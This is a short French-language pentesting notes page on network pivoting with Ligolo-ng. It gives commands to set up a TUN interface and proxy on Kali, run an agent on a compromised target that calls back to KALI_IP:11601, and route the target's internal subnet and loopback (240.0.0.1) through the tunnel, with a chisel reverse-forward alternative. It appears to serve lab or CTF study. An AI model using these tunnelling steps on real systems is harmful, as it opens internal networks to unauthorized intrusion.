Whackermelon
notes / pivoting-ligolo-ng

Pivoting — Ligolo-ng

Tunnels, routes, listeners.

sommaire

Ligolo-ng — tunnel par interface TUN

Différence avec chisel : ligolo crée une interface réseau (tun) et tu ROUTES le réseau de la cible dessus (au lieu d’un simple forward de port). Astuce clé : l’IP 240.0.0.1 représente le LOOPBACK de l’agent (le 127.0.0.1 de la cible).

Mise en place

# Kali (proxy)
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert

# Cible (agent)
./agent -connect KALI_IP:11601 -ignore-cert &

Router + atteindre le loopback de la cible

# dans la console proxy : session -> selectionner -> start
# reseau interne :
sudo ip route add SOUS_RESEAU/24 dev ligolo
# loopback de la cible (127.0.0.1) = 240.0.0.1 :
sudo ip route add 240.0.0.1/32 dev ligolo
# -> viser 240.0.0.1:PORT = 127.0.0.1:PORT sur la cible
#la route pointe bien vers ligolo ?
ip route show | grep ligolo

Note : la version Web UI = mêmes concepts (création d’interface + routes + start via des boutons). Alternative : chisel (R:9100:127.0.0.1:9100).

Dans cette section